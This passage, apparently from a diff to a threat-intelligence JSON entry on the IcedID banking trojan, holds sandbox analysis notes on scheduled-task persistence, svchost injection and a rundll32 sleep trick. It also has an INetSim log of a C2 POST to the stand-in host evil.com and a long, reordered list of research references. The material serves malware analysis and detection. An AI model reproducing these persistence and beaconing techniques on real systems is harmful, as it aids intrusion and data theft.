kernel32,Sleep -s\r\n* Setup a local listener to proxy traffic on 127.0.0.1:50000\r\n\r\n**[Example Log from C2 Network Communication]**\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] connect\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: POST /forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11 HTTP/1.1\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Connection: close\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Content-Type: application/x-www-form-urlencoded\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Content-Length: 196\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Host: evil.com\r\n[2018-03-19 12:45:55] [42078] 
[https_443_tcp 44785] [172.16.0.130:54803] recv: <(POSTDATA)>\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: POST data stored to: /var/lib/inetsim/http/postdata/a90b931cb23df85aa6e3f0039958b031c3b053a2\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: **Request URL: hxxps://evil.com/forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11**\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: Sending fake file configured for extension 'php'.\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: HTTP/1.1 200 OK\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Content-Type: text/html\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Server: INetSim HTTPs Server\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Date: Mon, 19 Mar 2018 16:45:55 GMT\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Connection: Close\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Content-Length: 258\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: Sending file: /var/lib/inetsim/http/fakefiles/sample.html\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] stat: 1 **method=POST url=hxxps://evil.com/forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11** sent=/var/lib/inetsim/http/fakefiles/sample.html postdata=/var/lib/inetsim/http/postdata/a90b931cb23df85aa6e3f0039958b031c3b053a2", + "description": "Analysis Observations:\r\n\r\n* It sets up persistence by creating a Scheduled Task with the following characteristics:\r\n * Name: Update\r\n * Trigger: At Log on\r\n * Action: %LocalAppData%\\$Example\\\\waroupada.exe /i\r\n * Conditions: Stop if the computer ceases to be idle.\r\n* The sub-directory 
within %LocalAppdata%, Appears to be randomly picked from the list of directories within %ProgramFiles%. This needs more verification.\r\n* The filename remained static during analysis.\r\n* The original malware exe (ex. waroupada.exe) will spawn an instance of svchost.exe as a sub-process and then inject/execute its malicious code within it\r\n* If \u201c/i\u201d is not passed as an argument, it sets up persistence and waits for reboot.\r\n* If \u201c/I\u201d is passed as an argument (as is the case when the scheduled task is triggered at login), it skips persistence setup and actually executes; resulting in C2 communication.\r\n* Employs an interesting method for sleeping by calling the Sleep function of kernel32.dll from the shell, like so:\r\n rundll32.exe kernel32,Sleep -s\r\n* Setup a local listener to proxy traffic on 127.0.0.1:50000\r\n\r\n**[Example Log from C2 Network Communication]**\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] connect\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: POST /forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11 HTTP/1.1\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Connection: close\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Content-Type: application/x-www-form-urlencoded\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Content-Length: 196\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Host: evil.com\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: <(POSTDATA)>\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: POST data stored to: /var/lib/inetsim/http/postdata/a90b931cb23df85aa6e3f0039958b031c3b053a2\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: **Request URL: 
hxxps://evil.com/forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11**\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: Sending fake file configured for extension 'php'.\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: HTTP/1.1 200 OK\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Content-Type: text/html\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Server: INetSim HTTPs Server\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Date: Mon, 19 Mar 2018 16:45:55 GMT\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Connection: Close\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Content-Length: 258\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: Sending file: /var/lib/inetsim/http/fakefiles/sample.html\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] stat: 1 **method=POST url=hxxps://evil.com/forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11** sent=/var/lib/inetsim/http/fakefiles/sample.html postdata=/var/lib/inetsim/http/postdata/a90b931cb23df85aa6e3f0039958b031c3b053a2", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.icedid", - "https://resource.redcanary.com/rs/003-YRU-314/images/2021-Threat-Detection-Report.pdf", - "https://unit42.paloaltonetworks.com/atoms/monsterlibra/", - "https://kienmanowar.wordpress.com/2020/08/16/manual-unpacking-icedid-write-up/", - "https://blogs.blackberry.com/en/2023/01/emotet-returns-with-new-methods-of-evasion", - "https://thedfirreport.com/2021/06/20/from-word-to-lateral-movement-in-1-hour/", - "https://www.fireeye.com/blog/threat-research/2021/02/melting-unc2198-icedid-to-ransomware-operations.html", - 
"https://drive.google.com/file/d/1jB0CsDvAADSrBeGxoi5gzyx8eQIiOJ2G/view", - "https://www.splunk.com/en_us/blog/security/detecting-icedid-could-it-be-a-trickbot-copycat.html", - "https://isc.sans.edu/diary/29740", - "https://www.cybereason.com/blog/cybereason-vs-egregor-ransomware", - "https://www.team-cymru.com/post/inside-the-icedid-backconnect-protocol", - "https://news.sophos.com/en-us/2020/02/18/nearly-a-quarter-of-malware-now-communicates-using-tls/", - "https://github.com/f0wl/deICEr", - "https://www.intezer.com/blog/research/conversation-hijacking-campaign-delivering-icedid/", - "https://www.proofpoint.com/us/blog/threat-insight/fork-ice-new-era-icedid", - "https://www.esentire.com/blog/conti-affiliate-exposed-new-domain-names-ip-addresses-and-email-addresses-uncovered-by-esentire", - "https://medium.com/walmartglobaltech/icedid-leverages-privateloader-7744771bf87f", - "https://www.microsoft.com/security/blog/2021/04/09/investigating-a-unique-form-of-email-delivery-for-icedid-malware/", - "https://eln0ty.github.io/malware%20analysis/IcedID/", - "https://www.bleepingcomputer.com/news/security/microsoft-exchange-targeted-for-icedid-reply-chain-hijacking-attacks/", - "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", - "https://thedfirreport.com/2022/04/25/quantum-ransomware/", - "https://blog.group-ib.com/prometheus-tds", - "https://zero2auto.com/2020/06/22/unpacking-visual-basic-packers/", - "https://resecurity.com/blog/article/shortcut-based-lnk-attacks-delivering-malicious-code-on-the-rise", - "https://www.silentpush.com/blog/malicious-infrastructure-as-a-service", - "https://unit42.paloaltonetworks.com/teasing-secrets-malware-configuration-parsing", - "https://www.secureworks.com/research/threat-profiles/gold-swathmore", - "https://www.secureworks.com/blog/gold-ulrick-leaks-reveal-organizational-structure-and-relationships", - "https://github.com/telekom-security/icedid_analysis", - 
"https://research.loginsoft.com/threat-research/icedid-malware-traversing-through-its-various-incarnations/", - "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", - "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", - "https://blog.bushidotoken.net/2022/04/lessons-from-conti-leaks.html", - "https://www.ironnet.com/blog/ransomware-graphic-blog", - "https://twitter.com/embee_research/status/1592067841154756610?s=20", - "https://thedfirreport.com/2022/04/04/stolen-images-campaign-ends-in-conti-ransomware/", - "https://isc.sans.edu/diary/Google+ads+lead+to+fake+software+pages+pushing+IcedID+Bokbot/29344", - "https://www.trendmicro.com/en_us/research/21/d/a-spike-in-bazarcall-and-icedid-activity.html", - "https://www.trendmicro.com/en_us/research/21/j/ransomware-operators-found-using-new-franchise-business-model.html", - "https://www.zscaler.com/blogs/security-research/onenote-growing-threat-malware-distribution", - "https://blog.talosintelligence.com/2018/04/icedid-banking-trojan.html", - "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-ransomexx", - "https://labs.sentinelone.com/evasive-maneuvers-massive-icedid-campaign-aims-for-stealth-with-benign-macros/", - "https://malwation.com/icedid-malware-technical-analysis-report/", - "https://www.youtube.com/watch?v=YEqLIR6hfOM", - "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/", - "https://www.crowdstrike.com/blog/sin-ful-spiders-wizard-spider-and-lunar-spider-sharing-the-same-web/", - "https://github.com/Lastline-Inc/iocs-tools/tree/main/2021-07-IcedID-Part-2", - "https://www.cynet.com/attack-techniques-hands-on/shelob-moonlight-spinning-a-larger-web/", - "https://threatpost.com/exchange-servers-speared-in-icedid-phishing-campaign/179137/", - 
"https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf", - "https://www.binarydefense.com/icedid-gziploader-analysis/", - "https://therecord.media/meet-prometheus-the-secret-tds-behind-some-of-todays-malware-campaigns/", - "https://blog.cyberint.com/icedid-stealer-man-in-the-browser-banking-trojan", - "https://intel471.com/blog/malvertising-surges-to-distribute-malware", - "https://blog.fox-it.com/2018/08/09/bokbot-the-rebirth-of-a-banker/", - "https://0xc0decafe.com/malware-analyst-guide-to-pe-timestamps/", - "https://www.microsoft.com/security/blog/2020/12/09/edr-in-block-mode-stops-icedid-cold/", - "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf", - "https://securityintelligence.com/icedid-operators-using-atsengine-injection-panel-to-hit-e-commerce-sites/", - "https://gist.github.com/psrok1/e6bf5851d674edda03a201e7f24a5e6b", - "https://blog.malwarebytes.com/threat-analysis/2019/12/new-version-of-icedid-trojan-uses-steganographic-payloads/", - "https://blog.unpac.me/2023/05/03/unpacme-weekly-new-version-of-icedid-loader", - "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself", - "https://intel471.com/blog/conti-emotet-ransomware-conti-leaks", - "https://content.secureworks.com/-/media/Files/US/Reports/Monthly%20Threat%20Intelligence/Secureworks_ECO1_ThreatIntelligenceExecutiveReport2022Vol2.ashx", - "https://thedfirreport.com/2021/07/19/icedid-and-cobalt-strike-vs-antivirus/", - "https://intel471.com/blog/malware-before-ransomware-trojan-information-stealer-cobalt-strike", - "https://download.microsoft.com/download/f/8/1/f816b8b6-bee3-41e5-b6cc-e925a5688f61/Microsoft_Digital_Defense_Report_2020_September.pdf", - "https://blogs.vmware.com/security/2021/07/hunting-icedid-and-unpacking-automation-with-qiling.html", - "https://twitter.com/felixw3000/status/1521816045769662468", - 
"https://blogs.vmware.com/security/2021/07/icedid-analysis-and-detection.html", - "https://unit42.paloaltonetworks.com/ta551-shathak-icedid/", - "https://blog.google/threat-analysis-group/initial-access-broker-repurposing-techniques-in-targeted-attacks-against-ukraine/", - "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", - "https://4rchib4ld.github.io/blog/IcedIDOnMyNeckImTheCoolest/", - "https://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/", - "https://www.intrinsec.com/emotet-returns-and-deploys-loaders/", - "https://blog.talosintelligence.com/2020/12/quarterly-ir-report-fall-2020-q4.html", - "https://www.spreaker.com/user/16860719/proofpoint-e29-mix-v1", - "https://nikpx.github.io/malware/analysis/2022/03/09/BokBot", - "https://www.team-cymru.com/post/a-visualizza-into-recent-icedid-campaigns", - "https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf", - "https://forensicitguy.github.io/analyzing-icedid-document/", - "https://matth.dmz42.org/posts/2022/automatically-unpacking-icedid-stage1-with-angr/", - "https://www.proofpoint.com/us/blog/threat-insight/first-step-initial-access-leads-ransomware", - "https://team-cymru.com/blog/2021/11/03/webinject-panel-administration-a-vantage-point-into-multiple-threat-actor-campaigns/", - "https://awakesecurity.com/blog/detecting-icedid-and-cobalt-strike-beacon-with-network-detection-and-response/", - "https://blog.reversinglabs.com/blog/code-reuse-across-packers-and-dll-loaders", - "https://www.group-ib.com/blog/icedid", - "https://www.cybereason.com/blog/threat-analysis-report-all-paths-lead-to-cobalt-strike-icedid-emotet-and-qbot", - "https://thedfirreport.com/2021/05/12/conti-ransomware/", - "https://go.recordedfuture.com/hubfs/reports/cta-2021-1112.pdf", - 
"https://www.crowdstrike.com/blog/bokbots-man-in-the-browser-overview/", - "https://www.bleepingcomputer.com/news/security/hackers-target-ukrainian-govt-with-icedid-malware-zimbra-exploits/", - "https://ceriumnetworks.com/threat-of-the-month-icedid-malware/", - "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko", - "https://dshield.org/diary/Recent+IcedID+Bokbot+activity/29740/", - "https://cert.gov.ua/article/39609", - "https://unit42.paloaltonetworks.com/wireshark-tutorial-emotet-infection/", - "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout", - "https://twitter.com/embee_research/status/1592067841154756610?s=20&t=hEALPAWr1LIt9pXcVpxjRQ", - "https://www.fortinet.com/blog/threat-research/spoofed-invoice-drops-iced-id", - "https://blog.nviso.eu/2023/03/20/icedids-vnc-backdoors-dark-cat-anubis-keyhole/", - "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/conti-leaks-examining-the-panama-papers-of-ransomware.html", - "https://blog.talosintelligence.com/2020/07/valak-emerges.html", - "https://team-cymru.com/blog/2021/05/19/tracking-bokbot-infrastructure/", - "https://digitalguardian.com/blog/iceid-banking-trojan-targeting-banks-payment-card-providers-e-commerce-sites", - "https://documents.trendmicro.com/assets/rpt/rpt-navigating-new-frontiers-trend-micro-2021-annual-cybersecurity-report.pdf", - "https://www.fortinet.com/blog/threat-research/deep-dive-icedid-malware-analysis-of-child-processes.html", - "https://www.esentire.com/blog/icedid-to-cobalt-strike-in-under-20-minutes", - "https://elis531989.medium.com/funtastic-packers-and-where-to-find-them-41429a7ef9a7", - "https://www.prodaft.com/m/reports/RIG___TLP_CLEAR-1.pdf", - "https://securityintelligence.com/icedid-banking-trojan-spruces-up-injection-tactics-to-add-stealth/", - 
"https://www.fortinet.com/blog/threat-research/icedid-malware-analysis-part-two.html", - "https://blogs.juniper.net/en-us/threat-research/covid-19-and-fmla-campaigns-used-to-install-new-icedid-banking-malware", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker", - "https://www.elastic.co/security-labs/icedids-network-infrastructure-is-alive-and-well", - "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf", - "https://securityintelligence.com/new-banking-trojan-icedid-discovered-by-ibm-x-force-research/", - "https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/", - "https://www.silentpush.com/blog/icedid-command-and-control-infrastructure", - "https://www.crowdstrike.com/blog/digging-into-bokbots-core-module/", - "https://www.youtube.com/watch?v=oZ4bwnjcXWg", - "https://isc.sans.edu/forums/diary/How+the+Contact+Forms+campaign+tricks+people/28142/", - "https://research.checkpoint.com/2021/melting-ice-tracking-icedid-servers-with-a-few-simple-steps/", - "https://twitter.com/Unit42_Intel/status/1645851799427874818", - "https://securelist.com/malicious-spam-campaigns-delivering-banking-trojans/102917", - "https://isc.sans.edu/forums/diary/TA551+Shathak+pushes+IcedID+Bokbot/28092/", - "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/rise-of-lnk-shortcut-files-malware/", - "https://www.nri-secure.co.jp/blog/explaining-the-tendency-of-malware-icedid", - "https://www.cybereason.com/blog/cybereason-vs.-quantum-locker-ransomware", - "https://research.loginsoft.com/threat-research/from-innocence-to-malice-the-onenote-malware-campaign-uncovered/", - "https://securityintelligence.com/posts/trickbot-group-systematically-attacking-ukraine", - "https://michaelkoczwara.medium.com/hunting-c2-with-shodan-223ca250d06f", - "https://www.elastic.co/security-labs/thawing-the-permafrost-of-icedid-summary", - 
"https://www.fortinet.com/blog/threat-research/icedid-malware-analysis-part-one.html", - "http://www.intezer.com/icedid-banking-trojan-shares-code-pony-2-0-trojan/", - "https://www.team-cymru.com/post/from-chile-with-malware", - "https://www.trendmicro.com/en_ie/research/22/l/icedid-botnet-distributors-abuse-google-ppc-to-distribute-malware.html", - "https://medium.com/@dawid.golak/icedid-aka-bokbot-analysis-with-ghidra-560e3eccb766", - "https://www.youtube.com/watch?v=7Dk7NkIbVqY", - "https://www.youtube.com/watch?v=wMXD4Sv1Alw", - "https://tccontre.blogspot.com/2021/01/", - "https://www.f5.com/labs/articles/threat-intelligence/icedid-banking-trojan-uses-covid-19-pandemic-to-lure-new-victims", - "https://aaqeel01.wordpress.com/2021/04/09/icedid-analysis/", - "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/", - "https://www.netresec.com/?page=Blog&month=2022-10&post=IcedID-BackConnect-Protocol", - "https://netresec.com/?b=214d7ff", - "https://www.netresec.com/?page=Blog&month=2023-02&post=How-to-Identify-IcedID-Network-Traffic", - "https://go.recordedfuture.com/hubfs/reports/cta-2022-0118.pdf", - "https://threatresearch.ext.hp.com/detecting-ta551-domains/", - "https://www.socinvestigation.com/icedid-banking-trojan-returns-with-new-ttps-detection-response/", - "https://tccontre.blogspot.com/2020/08/learning-from-iceid-loader-including.html", - "https://www.uptycs.com/blog/icedid-campaign-spotted-being-spiced-with-excel-4-macros", - "https://isc.sans.edu/diary/28636", - "https://blog.reconinfosec.com/an-encounter-with-ta551-shathak", - "https://www.elastic.co/security-labs/unpacking-icedid", - "https://www.proofpoint.com/us/blog/threat-insight/comprehensive-look-emotets-fall-2022-return", - "https://www.mimecast.com/globalassets/documents/whitepapers/taa551-treatresearch_final-1.15.21.pdf", - "https://www.vkremez.com/2018/09/lets-learn-deeper-dive-into.html", - "https://isc.sans.edu/diary/rss/28934", - 
"https://www.youtube.com/watch?v=wObF9n2UIAM", - "https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240", - "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", - "https://securityintelligence.com/posts/itg23-crypters-cooperation-between-cybercriminal-groups/", "https://isc.sans.edu/diary/IcedID+%28Bokbot%29+with+Dark+VNC+and+Cobalt+Strike/28884", + "https://unit42.paloaltonetworks.com/ta551-shathak-icedid/", + "https://team-cymru.com/blog/2021/05/19/tracking-bokbot-infrastructure/", + "https://securityintelligence.com/posts/itg23-crypters-cooperation-between-cybercriminal-groups/", + "https://www.fireeye.com/blog/threat-research/2021/02/melting-unc2198-icedid-to-ransomware-operations.html", + "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko", + "https://www.secureworks.com/blog/gold-ulrick-leaks-reveal-organizational-structure-and-relationships", + "https://thedfirreport.com/2021/05/12/conti-ransomware/", + "https://thedfirreport.com/2022/04/04/stolen-images-campaign-ends-in-conti-ransomware/", + "https://securityintelligence.com/icedid-operators-using-atsengine-injection-panel-to-hit-e-commerce-sites/", + "https://www.esentire.com/blog/conti-affiliate-exposed-new-domain-names-ip-addresses-and-email-addresses-uncovered-by-esentire", + "https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240", + "https://eln0ty.github.io/malware%20analysis/IcedID/", + "https://blog.google/threat-analysis-group/initial-access-broker-repurposing-techniques-in-targeted-attacks-against-ukraine/", + "https://ceriumnetworks.com/threat-of-the-month-icedid-malware/", + "https://www.f5.com/labs/articles/threat-intelligence/icedid-banking-trojan-uses-covid-19-pandemic-to-lure-new-victims", + 
"https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", + "https://www.fortinet.com/blog/threat-research/spoofed-invoice-drops-iced-id", + "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout", + "https://blog.unpac.me/2023/05/03/unpacme-weekly-new-version-of-icedid-loader", + "https://digitalguardian.com/blog/iceid-banking-trojan-targeting-banks-payment-card-providers-e-commerce-sites", + "https://www.crowdstrike.com/blog/sin-ful-spiders-wizard-spider-and-lunar-spider-sharing-the-same-web/", + "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/", + "https://therecord.media/meet-prometheus-the-secret-tds-behind-some-of-todays-malware-campaigns/", + "https://elis531989.medium.com/funtastic-packers-and-where-to-find-them-41429a7ef9a7", + "https://blog.talosintelligence.com/2020/07/valak-emerges.html", + "https://www.team-cymru.com/post/inside-the-icedid-backconnect-protocol", + "https://blog.group-ib.com/prometheus-tds", + "https://www.team-cymru.com/post/inside-the-icedid-backconnect-protocol-part-2", + "https://medium.com/@dawid.golak/icedid-aka-bokbot-analysis-with-ghidra-560e3eccb766", + "https://thedfirreport.com/2023/08/28/html-smuggling-leads-to-domain-wide-ransomware/", + "https://zero2auto.com/2020/06/22/unpacking-visual-basic-packers/", + "https://www.microsoft.com/security/blog/2021/04/09/investigating-a-unique-form-of-email-delivery-for-icedid-malware/", + "https://gist.github.com/psrok1/e6bf5851d674edda03a201e7f24a5e6b", + "https://research.loginsoft.com/threat-research/from-innocence-to-malice-the-onenote-malware-campaign-uncovered/", + "https://intel471.com/blog/conti-emotet-ransomware-conti-leaks", + "https://www.elastic.co/security-labs/icedids-network-infrastructure-is-alive-and-well", + 
"https://blogs.vmware.com/security/2021/07/hunting-icedid-and-unpacking-automation-with-qiling.html", + "https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q2%20Botnet%20Threat%20Update.pdf", + "https://www.crowdstrike.com/blog/digging-into-bokbots-core-module/", + "https://www.trendmicro.com/en_ie/research/22/l/icedid-botnet-distributors-abuse-google-ppc-to-distribute-malware.html", + "https://4rchib4ld.github.io/blog/IcedIDOnMyNeckImTheCoolest/", + "https://www.binarydefense.com/icedid-gziploader-analysis/", + "https://thedfirreport.com/2022/04/25/quantum-ransomware/", + "https://www.uptycs.com/blog/icedid-campaign-spotted-being-spiced-with-excel-4-macros", + "https://download.microsoft.com/download/f/8/1/f816b8b6-bee3-41e5-b6cc-e925a5688f61/Microsoft_Digital_Defense_Report_2020_September.pdf", + "https://securityintelligence.com/new-banking-trojan-icedid-discovered-by-ibm-x-force-research/", + "https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf", + "https://www.bleepingcomputer.com/news/security/hackers-target-ukrainian-govt-with-icedid-malware-zimbra-exploits/", + "https://www.esentire.com/blog/icedid-to-cobalt-strike-in-under-20-minutes", + "https://forensicitguy.github.io/analyzing-icedid-document/", + "https://www.fortinet.com/blog/threat-research/icedid-malware-analysis-part-one.html", + "https://blogs.blackberry.com/en/2023/01/emotet-returns-with-new-methods-of-evasion", + "https://cert.gov.ua/article/39609", + "https://www.elastic.co/security-labs/unpacking-icedid", + "https://netresec.com/?b=214d7ff", + "https://threatpost.com/exchange-servers-speared-in-icedid-phishing-campaign/179137/", + "https://nikpx.github.io/malware/analysis/2022/03/09/BokBot", + "https://www.silentpush.com/blog/malicious-infrastructure-as-a-service", + "https://blogs.vmware.com/security/2021/07/icedid-analysis-and-detection.html", + "https://www.vkremez.com/2018/09/lets-learn-deeper-dive-into.html", + 
"https://awakesecurity.com/blog/detecting-icedid-and-cobalt-strike-beacon-with-network-detection-and-response/", + "https://malwation.com/icedid-malware-technical-analysis-report/", + "https://resource.redcanary.com/rs/003-YRU-314/images/2021-Threat-Detection-Report.pdf", + "https://www.secureworks.com/research/threat-profiles/gold-swathmore", + "https://research.loginsoft.com/threat-research/icedid-malware-traversing-through-its-various-incarnations/", + "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf", + "https://www.group-ib.com/blog/icedid", + "https://www.trendmicro.com/en_us/research/21/j/ransomware-operators-found-using-new-franchise-business-model.html", + "https://resecurity.com/blog/article/shortcut-based-lnk-attacks-delivering-malicious-code-on-the-rise", + "https://www.bleepingcomputer.com/news/security/microsoft-exchange-targeted-for-icedid-reply-chain-hijacking-attacks/", + "https://www.proofpoint.com/us/blog/threat-insight/first-step-initial-access-leads-ransomware", + "http://www.intezer.com/icedid-banking-trojan-shares-code-pony-2-0-trojan/", + "https://blog.bushidotoken.net/2022/04/lessons-from-conti-leaks.html", + "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself", + "https://www.splunk.com/en_us/blog/security/detecting-icedid-could-it-be-a-trickbot-copycat.html", + "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", + "https://www.cynet.com/attack-techniques-hands-on/shelob-moonlight-spinning-a-larger-web/", + "https://www.youtube.com/watch?v=YEqLIR6hfOM", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", + "https://www.ironnet.com/blog/ransomware-graphic-blog", + "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/conti-leaks-examining-the-panama-papers-of-ransomware.html", + "https://blog.talosintelligence.com/2018/04/icedid-banking-trojan.html", + 
"https://blogs.juniper.net/en-us/threat-research/iceid-campaign-strikes-back", + "https://twitter.com/embee_research/status/1592067841154756610?s=20&t=hEALPAWr1LIt9pXcVpxjRQ", + "https://www.youtube.com/watch?v=7Dk7NkIbVqY", + "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/rise-of-lnk-shortcut-files-malware/", + "https://medium.com/walmartglobaltech/icedid-leverages-privateloader-7744771bf87f", + "https://threatresearch.ext.hp.com/detecting-ta551-domains/", + "https://twitter.com/felixw3000/status/1521816045769662468", + "https://github.com/Lastline-Inc/iocs-tools/tree/main/2021-07-IcedID-Part-2", + "https://blog.malwarebytes.com/threat-analysis/2019/12/new-version-of-icedid-trojan-uses-steganographic-payloads/", + "https://github.com/telekom-security/icedid_analysis", + "https://www.youtube.com/watch?v=wObF9n2UIAM", + "https://www.nri-secure.co.jp/blog/explaining-the-tendency-of-malware-icedid", + "https://aaqeel01.wordpress.com/2021/04/09/icedid-analysis/", + "https://www.trendmicro.com/en_us/research/21/d/a-spike-in-bazarcall-and-icedid-activity.html", + "https://isc.sans.edu/diary/29740", + "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf", + "https://www.cybereason.com/blog/cybereason-vs-egregor-ransomware", + "https://go.recordedfuture.com/hubfs/reports/cta-2022-0118.pdf", + "https://github.com/f0wl/deICEr", + "https://securelist.com/malicious-spam-campaigns-delivering-banking-trojans/102917", + "https://isc.sans.edu/diary/Google+ads+lead+to+fake+software+pages+pushing+IcedID+Bokbot/29344", + "https://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/", + "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", + "https://www.cybereason.com/blog/threat-analysis-report-all-paths-lead-to-cobalt-strike-icedid-emotet-and-qbot", + 
